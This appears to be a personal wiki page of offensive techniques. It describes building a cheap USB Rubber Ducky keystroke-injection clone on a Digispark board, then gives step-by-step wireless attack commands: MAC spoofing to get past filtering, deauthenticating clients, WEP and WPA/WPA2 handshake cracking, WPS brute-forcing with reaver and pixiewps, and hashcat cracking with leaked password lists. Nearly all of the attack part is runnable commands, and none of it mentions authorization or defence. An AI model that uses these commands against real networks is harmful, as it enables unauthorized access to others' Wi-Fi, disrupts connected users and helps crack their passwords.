Offensive
Rubber Ducky
Screw the $45~ thing, we're making our own for $1.15~.
https://hackernoon.com/low-cost-usb-rubber-ducky-pen-test-tool-for-3-using-digispark-and-duck2spark-5d59afc1910
https://github.com/PlatyPew/Digispark-Duckduino
https://github.com/mame82/duck2spark
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
Open Arduino IDE; File -> Preferences -> Additional Boards Manager URLs http://digistump.com/package_digistump_index.json
Tools -> Board -> Boards Manager -> Digistump AVR Boards - install it.
# cat > /etc/udev/rules.d/49-micronucleus.rules reboot
You can now flash stuff to the board by selecting it as 'Digispark Default 16.5mhz'.
Do not plug the board before compiling process, do it after when you'll be prompted.
## This seems not needed anymore as the AVR package ships up to date micronucleus, and the project stopped providing precompiled linux library?
#git clone https://github.com/micronucleus/micronucleus.git
#cp ~/micronucleus/commandline/micronucleus /home/c0rn3j/.arduino15/packages/digistump/tools/micronucleus
General
http://tools.kali.org/tools-listing
##Hashcat Hashcat is a tool to crack various hashes, passwords and other formats. Hashcat is now merged into one OpenCL version(used to have a CUDA version for nvidia GPUs- CudaHashcat, the new hashcat only supports OpenCL).
For WPA2 it uses a new(2017) format called hccapx.
http://tools.kali.org/wireless-attacks/mdk3
Preparation:
Packages: aircrack-ng wireshark-qt macchanger reaver-wps-fork-t6x
Kill your network manager service to avoid it interfering.
I am using NetworkManager.
sudo systemctl stop NetworkManager - sometimes it starts again so just try this twice...
Then use sudo airmon-ng to find out your interface name for the wireless card you want to use. If it is not listed, you are either lacking drivers or it is not compatible.
After finding out your interface name, turn your WLAN card into monitor mode with sudo airmon-ng start yourInterface, you will then have a _yourInterface_mon interface you can use. You can use the –verbose flag with the command to diagnose possible issues if it is not working as intended. You can use stop instead of start to make the interface go back to managed mode and use wi-fi as usual.
Since the default interface tends to be wlp8s0, that is what I am going to use for this page.
Change your MAC:
ip link set dev wlp8s0 down - bring the interface down so you can make changes to it
macchanger -r wlp8s0 - randomize MAC address completely. Alternatively use -m option and supply an address starting with 68:5D:43 or any other vendor specific address, as some routers and networks will not allow MAC that is not assigned to any vendor. (MAC is in this format XX:XX:XX:YY:YY:YY where XXXXXX is vendor specific and YYYYYY is random)
ip link set dev wlp8s0 up
Wifite
There is a script called wifite that can do most of these attacks even if the attacker doesn't understand them. It fails in some more complicated cases.
git clone https://github.com/derv82/wifite
cd wifite/
sudo python2.7 ./wifite.py
Scan your surroundings
sudo airodump-ng wlp8s0mon
MAC address filtering
Use airodump to look for an active client and change your MAC address to theirs.
Hidden SSID
aireplay-ng -0 0 -a 00:1F:1F:1F:1F:1F -c 00:1F:1F:1F:1F:1F --ignore-negative-one wlp8s0mon
while running airodump. Successfully deauthing a client will make them broadcast the SSID in the clear because they'll have to reconnect.
WEP
airmon-ng start wlp8s0
airodump-ng wlp8s0mon
airodump-ng -w wep -c CHANNEL --bssid BSSID wlp8s0mon
aireplay-ng -1 0 -a BSSID wlp8s0mon
aireplay-ng -3 -b BSSID wlp8s0mon
aircrack-ng filename.cap
WPA/WPA2-PSK
airmon-ng start wlp8s0
airodump-ng wlp8s0mon
airodump-ng -c CHANNEL -w filename --bssid BSSID wlp8s0mon
aireplay-ng -0 0 -a BSSID wlp8s0mon
After obtaining 4-way handshake:
aircrack-ng –w WORDLIST -b BSSID filename.cap
WPA2-MGT MSCHAPv2
http://pastebin.com/CnJstqpH
WPS
Scan for WPS enabled APs
sudo wash -i wlp8s0mon
For Bruteforcing and logging for possible pixie attack. Use -K 1 parameter to try pixiewps while reaver is running. The plain bruteforce attack might take minutes to days, but usually it's max 10 hours.
sudo reaver -i wlp8s0mon -b BSSID -c channel -f -S -vvv -H
After obtaining at least one response you can use pixiewps to try the offline pixie attack. Whole pixiewps command will be saved in a text file if you supplied the -H command. Pixie attack takes anywhere from a second to 30 minutes, and only works if the router is vulnerable to it.
Cracking a handshake/capture file
Using GPU
Converting .cap to .hccapx
Use cap2hccapx (from the hashcat-utils package)
cap2hccapx capture.cap capture.hccapx
HCCAP to password
hashcat -m 2500 -w 1 filename.hccapx wordlist.txt
Using CPU
IVS file crack aircrack-ng -a2 -b F8:8E:88:AA:FF:BB -w wordlist-final.txt ivsfile.ivs
Other stuff
Find out default gateway route -n
Obtaining wordlists
hashes.org have awesome leaked lists, so I'm going with a bunch these. You can find different lists on torrent trackers.
7z x xxx_found.7z -owordlists - extract file into a folder called 'wordlists'
cat xxx_found_sorted.txt xxx_found_sorted.txt xxx_found_sorted.txt > mywordlist.txt - join all lists into one
sed -r '/^.{,7}$/d' mywordlist.txt > WPAwordlist.txt - remove everything that is 7 characters or less from the file and write that to a new file. WPA/2 does not accept less than 8 characters.
sort -T ~ -u WPAwordlist.txt > WPAwordlist_sorted.txt - change temporary directory to the home directory(sort would fail on a big file if /tmp is too small) and sort into a new file